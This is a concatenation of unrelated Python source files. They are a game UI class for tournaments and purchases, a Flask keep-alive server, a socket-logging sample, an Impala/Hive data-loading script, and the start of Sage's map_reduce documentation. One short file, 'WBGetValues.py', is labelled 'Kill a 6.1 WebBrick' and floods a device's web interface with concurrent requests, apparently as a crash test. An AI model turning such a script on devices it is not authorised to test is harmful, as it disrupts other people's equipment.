position=(x + 23, y + 4),
size=(sclx, scly),
label='',
button_type='square',
autoselect=True,
on_activate_call=lambda: self.run(None, tournament_button=data))
ba.widget(edit=btn,
show_buffer_bottom=50,
show_buffer_top=50,
show_buffer_left=400,
show_buffer_right=200)
if select:
ba.containerwidget(edit=parent,
selected_child=btn,
visible_child=btn)
image_width = sclx * 0.85 * 0.75
data['image'] = ba.imagewidget(
parent=parent,
draw_controller=btn,
position=(x + 21 + sclx * 0.5 - image_width * 0.5, y + scly - 150),
size=(image_width, image_width * 0.5),
model_transparent=self.lsbt,
model_opaque=self.lsbo,
texture=ba.gettexture('black'),
opacity=0.2,
mask_texture=ba.gettexture('mapPreviewMask'))
data['lock_image'] = ba.imagewidget(
parent=parent,
draw_controller=btn,
position=(x + 21 + sclx * 0.5 - image_width * 0.25,
y + scly - 150),
size=(image_width * 0.5, image_width * 0.5),
texture=ba.gettexture('lock'),
opacity=0.0)
data['button_text'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 20 + sclx * 0.5,
y + scly - 35),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=sclx * 0.76,
scale=0.85,
color=(0.8, 1.0, 0.8, 1.0))
header_color = (0.43, 0.4, 0.5, 1)
value_color = (0.6, 0.6, 0.6, 1)
x_offs = 0
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.entryFeeText'),
v_align='center',
maxwidth=100,
scale=0.9,
color=header_color,
flatness=1.0)
data['entry_fee_text_top'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360,
y + scly - 60),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=60,
scale=1.3,
color=value_color,
flatness=1.0)
data['entry_fee_text_or'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360,
y + scly - 90),
size=(0, 0),
h_align='center',
text='',
v_align='center',
maxwidth=60,
scale=0.5,
color=value_color,
flatness=1.0)
data['entry_fee_text_remaining'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360, y +
scly - 90),
size=(0, 0),
h_align='center',
text='',
v_align='center',
maxwidth=60,
scale=0.5,
color=value_color,
flatness=1.0)
data['entry_fee_ad_image'] = ba.imagewidget(
parent=parent,
size=(40, 40),
draw_controller=btn,
position=(x + 360 - 20, y + scly - 140),
opacity=0.0,
texture=ba.gettexture('tv'))
x_offs += 50
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 447 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.prizesText'),
v_align='center',
maxwidth=130,
scale=0.9,
color=header_color,
flatness=1.0)
data['button_x'] = x
data['button_y'] = y
data['button_scale_y'] = scly
xo2 = 0
prize_value_scale = 1.5
data['prize_range_1_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
text='-',
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_1_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='-',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
data['prize_range_2_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_2_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
data['prize_range_3_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_3_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.currentBestText'),
v_align='center',
maxwidth=180,
scale=0.9,
color=header_color,
flatness=1.0)
data['current_leader_name_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs - (170 / 1.4) * 0.5,
y + scly - 60 - 40 * 0.5),
selectable=True,
click_activate=True,
autoselect=True,
on_activate_call=lambda: self._show_leader(tournament_button=data),
size=(170 / 1.4, 40),
h_align='center',
text='-',
v_align='center',
maxwidth=170,
scale=1.4,
color=value_color,
flatness=1.0)
data['current_leader_score_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs, y + scly - 113 + 10),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=170,
scale=1.8,
color=value_color,
flatness=1.0)
data['more_scores_button'] = ba.buttonwidget(
parent=parent,
position=(x + 620 + x_offs - 60, y + scly - 50 - 125),
color=(0.5, 0.5, 0.6),
textcolor=(0.7, 0.7, 0.8),
label='-',
size=(120, 40),
autoselect=True,
up_widget=data['current_leader_name_text'],
text_scale=0.6,
on_activate_call=lambda: self._show_scores(tournament_button=data))
ba.widget(edit=data['current_leader_name_text'],
down_widget=data['more_scores_button'])
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.timeRemainingText'),
v_align='center',
maxwidth=180,
scale=0.9,
color=header_color,
flatness=1.0)
data['time_remaining_value_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 68),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=180,
scale=2.0,
color=value_color,
flatness=1.0)
data['time_remaining_out_of_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 110),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=120,
scale=0.72,
color=(0.4, 0.4, 0.5),
flatness=1.0)
return data
def _switch_to_league_rankings(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
from bastd.ui.league.rankwindow import LeagueRankWindow
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
assert self._league_rank_button is not None
ba.app.ui.set_main_menu_window(
LeagueRankWindow(origin_widget=self._league_rank_button.get_button(
)).get_root_widget())
def _switch_to_score(
self,
show_tab: Optional[
StoreBrowserWindow.TabID] = StoreBrowserWindow.TabID.EXTRAS
) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
assert self._store_button is not None
ba.app.ui.set_main_menu_window(
StoreBrowserWindow(
origin_widget=self._store_button.get_button(),
show_tab=show_tab,
back_location='CoopBrowserWindow').get_root_widget())
def _show_leader(self, tournament_button: dict[str, Any]) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account.viewer import AccountViewerWindow
tournament_id = tournament_button['tournament_id']
# FIXME: This assumes a single player entry in leader; should expand
# this to work with multiple.
if tournament_id is None or tournament_button['leader'] is None or len(
tournament_button['leader'][2]) != 1:
ba.playsound(ba.getsound('error'))
return
ba.playsound(ba.getsound('swish'))
AccountViewerWindow(
account_id=tournament_button['leader'][2][0].get('a', None),
profile_id=tournament_button['leader'][2][0].get('p', None),
position=tournament_button['current_leader_name_text'].
get_screen_space_center())
def _show_scores(self, tournament_button: dict[str, Any]) -> None:
# pylint: disable=cyclic-import
from bastd.ui.tournamentscores import TournamentScoresWindow
tournament_id = tournament_button['tournament_id']
if tournament_id is None:
ba.playsound(ba.getsound('error'))
return
TournamentScoresWindow(
tournament_id=tournament_id,
position=tournament_button['more_scores_button'].
get_screen_space_center())
def is_tourney_data_up_to_date(self) -> bool:
"""Return whether our tourney data is up to date."""
return self._tourney_data_up_to_date
def run(self,
game: Optional[str],
tournament_button: Optional[dict[str, Any]] = None) -> None:
"""Run the provided game."""
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
# pylint: disable=too-many-return-statements
# pylint: disable=cyclic-import
from bastd.ui.confirm import ConfirmWindow
from bastd.ui.tournamententry import TournamentEntryWindow
from bastd.ui.purchase import PurchaseWindow
from bastd.ui.account import show_sign_in_prompt
args: dict[str, Any] = {}
# Do a bit of pre-flight for tournament options.
if tournament_button is not None:
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
if not self._tourney_data_up_to_date:
ba.screenmessage(
ba.Lstr(resource='tournamentCheckingStateText'),
color=(1, 1, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['tournament_id'] is None:
ba.screenmessage(
ba.Lstr(resource='internal.unavailableNoConnectionText'),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['required_league'] is not None:
ba.screenmessage(ba.Lstr(
resource='league.tournamentLeagueText',
subs=[
('${NAME}',
ba.Lstr(
translate=('leagueNames',
tournament_button['required_league'])))
]),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['time_remaining'] <= 0:
ba.screenmessage(ba.Lstr(resource='tournamentEndedText'),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
# Game is whatever the tournament tells us it is.
game = ba.app.accounts.tournament_info[
tournament_button['tournament_id']]['game']
if tournament_button is None and game == 'Easy:The Last Stand':
ConfirmWindow(ba.Lstr(resource='difficultyHardUnlockOnlyText',
fallback_resource='difficultyHardOnlyText'),
cancel_button=False,
width=460,
height=130)
return
# Infinite onslaught/runaround require pro; bring up a store link if
# need be.
if tournament_button is None and game in (
'Challenges:Infinite Runaround',
'Challenges:Infinite Onslaught'
) and not ba.app.accounts.have_pro():
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
else:
PurchaseWindow(items=['pro'])
return
required_purchase: Optional[str]
if game in ['Challenges:Meteor Shower']:
required_purchase = 'games.meteor_shower'
elif game in [
'Challenges:Target Practice', 'Challenges:Target Practice B'
]:
required_purchase = 'games.target_practice'
elif game in ['Challenges:Ninja Fight']:
required_purchase = 'games.ninja_fight'
elif game in ['Challenges:Pro Ninja Fight']:
required_purchase = 'games.ninja_fight'
elif game in [
'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
]:
required_purchase = 'games.easter_egg_hunt'
else:
required_purchase = None
if (tournament_button is None and required_purchase is not None
and not _ba.get_purchased(required_purchase)):
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
else:
PurchaseWindow(items=[required_purchase])
return
self._save_state()
# For tournaments, we pop up the entry window.
if tournament_button is not None:
TournamentEntryWindow(
tournament_id=tournament_button['tournament_id'],
position=tournament_button['button'].get_screen_space_center())
else:
# Otherwise just dive right in.
assert game is not None
if ba.app.launch_coop_game(game, args=args):
ba.containerwidget(edit=self._root_widget,
transition='out_left')
def _back(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.play import PlayWindow
# If something is selected, store it.
self._save_state()
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
ba.app.ui.set_main_menu_window(
PlayWindow(transition='in_left').get_root_widget())
def _restore_state(self) -> None:
try:
sel_name = ba.app.ui.window_states.get(type(self),
{}).get('sel_name')
if sel_name == 'Back':
sel = self._back_button
elif sel_name == 'Scroll':
sel = self._scrollwidget
elif sel_name == 'PowerRanking':
sel = self._league_rank_button_widget
elif sel_name == 'Store':
sel = self._store_button_widget
else:
sel = self._scrollwidget
ba.containerwidget(edit=self._root_widget, selected_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self}.')
def _save_state(self) -> None:
cfg = ba.app.config
try:
sel = self._root_widget.get_selected_child()
if sel == self._back_button:
sel_name = 'Back'
elif sel == self._store_button_widget:
sel_name = 'Store'
elif sel == self._league_rank_button_widget:
sel_name = 'PowerRanking'
elif sel == self._scrollwidget:
sel_name = 'Scroll'
else:
raise ValueError('unrecognized selection')
ba.app.ui.window_states[type(self)] = {'sel_name': sel_name}
except Exception:
ba.print_exception(f'Error saving state for {self}.')
cfg['Selected Coop Row'] = self._selected_row
cfg['Selected Coop Custom Level'] = self._selected_custom_level
cfg['Selected Coop Challenge Level'] = self._selected_challenge_level
cfg['Selected Coop Campaign Level'] = self._selected_campaign_level
cfg.commit()
def sel_change(self, row: str, game: str) -> None:
"""(internal)"""
if self._do_selection_callbacks:
if row == 'custom':
self._selected_custom_level = game
if row == 'challenges':
self._selected_challenge_level = game
elif row == 'campaign':
self._selected_campaign_level = game
|
keepalive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
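# Start the Flask app in a background thread so the caller's main loop
# isn't blocked; an external uptime pinger hitting '/' then keeps the
# host awake (assumes keep_alive() is called once at startup).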
server = Thread(target=run)
server.start() |
simple_sample.py | import argparse
import logging
import multiprocessing as mp
import os
import time
from socket_logging import Server, ServerHandler, register_handler
MAX_BYTES = 100000
BATCH_SIZE = 2000
LOG_FILE = "data/log/socket.log"
TEST_ROUND = 500
WORKER_NUM = 5
def worker(text):
client_logger = logging.getLogger("client_logger")
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(filename)s- [%(levelname)s]: %(message)s"
)
register_handler(
client_logger, logging_level=logging.INFO, formatter=formatter, verbose=True
)
client_logger.setLevel(logging.INFO)
pid = os.getpid()
for i in range(TEST_ROUND):
client_logger.info(f"{i} {text} from {pid}")
time.sleep(0.01)
def sample_running(text):
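# Use the "spawn" start method so each worker starts with a fresh
# interpreter, avoiding logging handlers and locks inherited via fork.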
procs = [
mp.get_context("spawn").Process(target=worker, args=(text,))
for _ in range(WORKER_NUM)
]
for proc in procs:
proc.start()
for proc in procs:
proc.join()
proc.terminate()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--text", default="client test")
args = parser.parse_args()
server_handler = ServerHandler(LOG_FILE, maxBytes=MAX_BYTES)
server_handler.setLevel(logging.INFO)
server = Server(server_handler, batch_size=BATCH_SIZE, verbose=True)
server.start()
sample_running(args.text)
server.stop()
|
WBGetValues.py | #
# Kill a 6.1 WebBrick
#
#
import httplib, threading
adrs = "10.100.100.100"
uri = "/values.inc"
def doConn(i):
print "Starting WebBrick Connection %d" % i
conn = httplib.HTTPConnection(adrs)
print "Sending try"
conn.request("GET",uri)
res = conn.getresponse()
print "Try %d gave %d %s" % (i,res.status,res.reason)
def main():
tasks = {}
for i in range(0,10):
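# Pass the callable and its argument separately; writing target=doConn(i)
# would run the request here and hand Thread the None return value.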
tasks[i] = threading.Thread(target=doConn, args=(i,))
for i in range(0,10):
tasks[i].start()
if __name__ == '__main__':
main()
|
load-data.py | #!/usr/bin/env python
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# This script is used to load the proper datasets for the specified workloads. It loads
# all data via Hive except for parquet data which needs to be loaded via Impala.
# Most DDL commands are executed by Impala.
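# Example invocation (illustrative; see the option definitions below):
#   ./load-data.py --workloads=tpch --exploration_strategy=core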
import collections
import os
import re
import sqlparse
import subprocess
import sys
import tempfile
import time
from itertools import product
from optparse import OptionParser
from Queue import Queue
from tests.beeswax.impala_beeswax import *
from threading import Thread
parser = OptionParser()
parser.add_option("-e", "--exploration_strategy", dest="exploration_strategy",
default="core",
help="The exploration strategy for schema gen: 'core', "\
"'pairwise', or 'exhaustive'")
parser.add_option("--hive_warehouse_dir", dest="hive_warehouse_dir",
default="/test-warehouse",
help="The HDFS path to the base Hive test warehouse directory")
parser.add_option("-w", "--workloads", dest="workloads",
help="Comma-separated list of workloads to load data for. If 'all' is "\
"specified then data for all workloads is loaded.")
parser.add_option("-s", "--scale_factor", dest="scale_factor", default="",
help="An optional scale factor to generate the schema for")
parser.add_option("-f", "--force_reload", dest="force_reload", action="store_true",
default=False, help='Skips HDFS exists check and reloads all tables')
parser.add_option("--impalad", dest="impalad", default="localhost:21000",
help="Impala daemon to connect to")
parser.add_option("--hive_hs2_hostport", dest="hive_hs2_hostport",
default="localhost:11050",
help="HS2 host:Port to issue Hive queries against using beeline")
parser.add_option("--table_names", dest="table_names", default=None,
help="Only load the specified tables - specified as a comma-seperated "\
"list of base table names")
parser.add_option("--table_formats", dest="table_formats", default=None,
help="Override the test vectors and load using the specified table "\
"formats. Ex. --table_formats=seq/snap/block,text/none")
parser.add_option("--hdfs_namenode", dest="hdfs_namenode", default="localhost:20500",
help="HDFS name node for Avro schema URLs, default localhost:20500")
parser.add_option("--workload_dir", dest="workload_dir",
default=os.environ['IMPALA_WORKLOAD_DIR'],
help="Directory that contains Impala workloads")
parser.add_option("--dataset_dir", dest="dataset_dir",
default=os.environ['IMPALA_DATASET_DIR'],
help="Directory that contains Impala datasets")
parser.add_option("--use_kerberos", action="store_true", default=False,
help="Load data on a kerberized cluster.")
options, args = parser.parse_args()
DATA_LOAD_DIR = '/tmp/data-load-files'
WORKLOAD_DIR = options.workload_dir
DATASET_DIR = options.dataset_dir
TESTDATA_BIN_DIR = os.path.join(os.environ['IMPALA_HOME'], 'testdata/bin')
AVRO_SCHEMA_DIR = "avro_schemas"
GENERATE_SCHEMA_CMD = "generate-schema-statements.py --exploration_strategy=%s "\
"--workload=%s --scale_factor=%s --verbose"
# Load data using Hive's beeline because the Hive shell has regressed (CDH-17222).
# The Hive shell is stateful, meaning that certain series of actions lead to problems.
# Examples of problems due to the statefulness of the Hive shell:
# - Creating an HBase table changes the replication factor to 1 for subsequent LOADs.
# - INSERTs into an HBase table fail if they are the first stmt executed in a session.
# However, beeline itself also has bugs. For example, inserting a NULL literal into
# a string-typed column leads to an NPE. We work around these problems by using LOAD from
# a datafile instead of doing INSERTs.
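# An illustrative (hypothetical) contrast of the two approaches:
#   INSERT INTO t VALUES (NULL);                 -- beeline may NPE on the NULL literal
#   LOAD DATA INPATH '/tmp/t.txt' INTO TABLE t;  -- workaround: load from a data file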
# TODO: Adjust connection string for --use_kerberos=true appropriately.
HIVE_CMD = os.path.join(os.environ['HIVE_HOME'], 'bin/beeline')
HIVE_ARGS = '-u "jdbc:hive2://%s/default;auth=noSasl" --verbose=true'\
% (options.hive_hs2_hostport)
HADOOP_CMD = os.path.join(os.environ['HADOOP_HOME'], 'bin/hadoop')
def available_workloads(workload_dir):
return [subdir for subdir in os.listdir(workload_dir)
if os.path.isdir(os.path.join(workload_dir, subdir))]
def validate_workloads(all_workloads, workloads):
for workload in workloads:
if workload not in all_workloads:
print 'Workload \'%s\' not found in workload directory' % workload
print 'Available workloads: ' + ', '.join(all_workloads)
sys.exit(1)
def exec_cmd(cmd, error_msg, exit_on_error=True):
ret_val = -1
try:
ret_val = subprocess.call(cmd, shell=True)
except Exception as e:
error_msg = "%s: %s" % (error_msg, str(e))
finally:
if ret_val != 0:
print error_msg
if exit_on_error: sys.exit(ret_val)
return ret_val
def exec_hive_query_from_file(file_name):
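  """Run the statements in file_name through beeline, if the file exists."""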
if not os.path.exists(file_name): return
hive_cmd = "%s %s -f %s" % (HIVE_CMD, HIVE_ARGS, file_name)
print 'Executing Hive Command: %s' % hive_cmd
exec_cmd(hive_cmd, 'Error executing file from Hive: ' + file_name)
def exec_hbase_query_from_file(file_name):
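  """Run file_name through the HBase shell, if the file exists."""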
if not os.path.exists(file_name): return
hbase_cmd = "hbase shell %s" % file_name
print 'Executing HBase Command: %s' % hbase_cmd
exec_cmd(hbase_cmd, 'Error executing hbase create commands')
def exec_impala_query_from_file(file_name):
"""Execute each query in an Impala query file individually"""
is_success = True
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
try:
impala_client.connect()
with open(file_name, 'r+') as query_file:
queries = sqlparse.split(query_file.read())
for query in queries:
query = sqlparse.format(query.rstrip(';'), strip_comments=True)
print '(%s):\n%s\n' % (file_name, query.strip())
result = impala_client.execute(query)
except Exception as e:
print "Data Loading from Impala failed with error: %s" % str(e)
is_success = False
finally:
impala_client.close_connection()
return is_success
def exec_bash_script(file_name):
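  """Execute file_name with bash, printing an error message on failure."""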
bash_cmd = "bash %s" % file_name
print 'Executing Bash Command: ' + bash_cmd
exec_cmd(bash_cmd, 'Error executing bash script: ' + file_name)
def generate_schema_statements(workload):
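  """Build and run the generate-schema-statements.py command for this workload
  from the current command-line options."""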
generate_cmd = GENERATE_SCHEMA_CMD % (options.exploration_strategy, workload,
options.scale_factor)
if options.table_names:
generate_cmd += " --table_names=%s" % options.table_names
if options.force_reload:
generate_cmd += " --force_reload"
if options.table_formats:
generate_cmd += " --table_formats=%s" % options.table_formats
if options.hive_warehouse_dir is not None:
generate_cmd += " --hive_warehouse_dir=%s" % options.hive_warehouse_dir
if options.hdfs_namenode is not None:
generate_cmd += " --hdfs_namenode=%s" % options.hdfs_namenode
print 'Executing Generate Schema Command: ' + generate_cmd
schema_cmd = os.path.join(TESTDATA_BIN_DIR, generate_cmd)
error_msg = 'Error generating schema statements for workload: ' + workload
exec_cmd(schema_cmd, error_msg)
def get_dataset_for_workload(workload):
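  """Return the dataset name parsed from the workload's <workload>_dimensions.csv file,
  exiting if the file or the dataset entry is missing."""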
dimension_file_name = os.path.join(WORKLOAD_DIR, workload,
'%s_dimensions.csv' % workload)
if not os.path.isfile(dimension_file_name):
print 'Dimension file not found: ' + dimension_file_name
sys.exit(1)
with open(dimension_file_name, 'rb') as input_file:
match = re.search(r'dataset:\s*([\w\-\.]+)', input_file.read())
if match:
return match.group(1)
else:
print 'Dimension file does not contain dataset for workload \'%s\'' % (workload)
sys.exit(1)
def copy_avro_schemas_to_hdfs(schemas_dir):
"""Recursively copies all of schemas_dir to the test warehouse."""
if not os.path.exists(schemas_dir):
print 'Avro schema dir (%s) does not exist. Skipping copy to HDFS.' % schemas_dir
return
exec_hadoop_fs_cmd("-mkdir -p " + options.hive_warehouse_dir)
exec_hadoop_fs_cmd("-put -f %s %s/" % (schemas_dir, options.hive_warehouse_dir))
def exec_hadoop_fs_cmd(args, exit_on_error=True):
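  """Run 'hadoop fs' with the given arguments, optionally exiting on error."""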
cmd = "%s fs %s" % (HADOOP_CMD, args)
print "Executing Hadoop command: " + cmd
exec_cmd(cmd, "Error executing Hadoop command, exiting",
exit_on_error=exit_on_error)
def exec_impala_query_from_file_parallel(query_files):
# Get the name of the query file that loads the base tables, if it exists.
# TODO: Find a better way to detect the file that loads the base tables.
create_base_table_file = next((q for q in query_files if 'text' in q), None)
if create_base_table_file:
is_success = exec_impala_query_from_file(create_base_table_file)
query_files.remove(create_base_table_file)
# If loading the base tables failed, exit with a non-zero error code.
if not is_success: sys.exit(1)
if not query_files: return
threads = []
result_queue = Queue()
for query_file in query_files:
thread = Thread(target=lambda x: result_queue.put(exec_impala_query_from_file(x)),
args=[query_file])
thread.daemon = True
threads.append(thread)
thread.start()
# Keep looping until the number of results retrieved is the same as the number of
# threads spawned, or until a data loading query fails. result_queue.get() will
# block until a result is available in the queue.
num_fetched_results = 0
while num_fetched_results < len(threads):
success = result_queue.get()
num_fetched_results += 1
if not success: sys.exit(1)
# There is a small window where a thread may still be alive even if all the threads have
# finished putting their results in the queue.
for thread in threads: thread.join()
def invalidate_impala_metadata():
print "Invalidating Metadata"
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
impala_client.connect()
try:
impala_client.execute('invalidate metadata')
finally:
impala_client.close_connection()
if __name__ == "__main__":
all_workloads = available_workloads(WORKLOAD_DIR)
workloads = []
if options.workloads is None:
print "At least one workload name must be specified."
parser.print_help()
sys.exit(1)
elif options.workloads == 'all':
print 'Loading data for all workloads.'
workloads = all_workloads
else:
workloads = options.workloads.split(",")
validate_workloads(all_workloads, workloads)
print 'Starting data load for the following workloads: ' + ', '.join(workloads)
loading_time_map = collections.defaultdict(float)
for workload in workloads:
start_time = time.time()
dataset = get_dataset_for_workload(workload)
generate_schema_statements(workload)
assert os.path.isdir(os.path.join(DATA_LOAD_DIR, dataset)), ("Data loading files "
"do not exist for (%s)" % dataset)
os.chdir(os.path.join(DATA_LOAD_DIR, dataset))
copy_avro_schemas_to_hdfs(AVRO_SCHEMA_DIR)
dataset_dir_contents = os.listdir(os.getcwd())
load_file_substr = "%s-%s" % (workload, options.exploration_strategy)
# Data loading with Impala is done in parallel, each file format has a separate query
# file.
create_filename = '%s-impala-generated' % load_file_substr
load_filename = '%s-impala-load-generated' % load_file_substr
impala_create_files = [f for f in dataset_dir_contents if create_filename in f]
impala_load_files = [f for f in dataset_dir_contents if load_filename in f]
# Execute the data loading scripts.
# Creating tables in Impala has no dependencies, so we execute them first.
# HBase table inserts are done via Hive, so the HBase tables need to be created before
# running the Hive script. Some of the Impala inserts depend on Hive tables,
# so they're done at the end. Finally, the HBase tables that have been filled with data
# need to be flushed.
exec_impala_query_from_file_parallel(impala_create_files)
exec_hbase_query_from_file('load-%s-hbase-generated.create' % load_file_substr)
exec_hive_query_from_file('load-%s-hive-generated.sql' % load_file_substr)
exec_hbase_query_from_file('post-load-%s-hbase-generated.sql' % load_file_substr)
if impala_load_files: invalidate_impala_metadata()
exec_impala_query_from_file_parallel(impala_load_files)
loading_time_map[workload] = time.time() - start_time
invalidate_impala_metadata()
total_time = 0.0
for workload, load_time in loading_time_map.iteritems():
total_time += load_time
print 'Data loading for workload \'%s\' completed in: %.2fs'\
% (workload, load_time)
print 'Total load time: %.2fs\n' % total_time
|
map_reduce.py | r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There is an efficient way to distribute computations on a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet`
(see :mod:`sage.sets.recursively_enumerated_set` for more details)
over which one would like to perform the following kind of operations:
* Compute the cardinality of a (very large) set defined recursively
(through a call to :class:`RecursivelyEnumeratedSet_forest`)
* More generally, compute any kind of generating series over this set
* Test a conjecture, e.g. find an element of `S` satisfying a specific
property, or check that none does or that they all do
* Count/list the elements of `S` that have a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS:
- Florent Hivert -- code, documentation (2012--2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- some documentation (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce?
--------------------------------------------
This implementation is specific to :class:`RecursivelyEnumeratedSet_forest`, and uses its
properties to do its job. Not only mapping and reducing but also
**generating the elements** of `S` is done on different processors.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need to set the environment variable `SAGE_NUM_THREADS` to the
desired number of parallel threads to be used:
sage: import os # not tested
sage: os.environ["SAGE_NUM_THREADS"] = '8' # not tested
Second, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet_forest` representing your set `S` (see
:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a
"map" function as well as a "reduce" function. Here are some examples:
* **Counting the number of elements.** In this situation, the map function
can be set to ``lambda x: 1``, and the reduce function just adds the
values together, i.e. ``lambda x, y: x + y``.
We count binary words of length `\leq 16`::
sage: seeds = [[]]
sage: succ = lambda l: [l + [0], l + [1]] if len(l) < 16 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x, y: x + y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
This matches the number of binary words of length `\leq 16`::
sage: factor(131071 + 1)
2^17
Note that the map and reduce functions here have the default values of the
:meth:`sage.sets.recursively_enumerated_set.RecursivelyEnumeratedSet_forest.map_reduce` method
so that the number of elements can be obtained more simply with::
sage: S.map_reduce()
131071
Instead of using :func:`RecursivelyEnumeratedSet`, one can directly use
:class:`RESetMapReduce`, which gives finer
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: S.run()
131071
* **Generating series.** For this, take a Map function that associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x, y: x + y``.
We compute the generating series for counting binary words of each
length `\leq 16`::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(
....: map_function=lambda z: x**len(z),
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12
+ 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6
+ 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{16} (2x)^i`::
sage: sp == sum((2*x)^i for i in range(17))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: structure='forest',
....: enumeration='depth')
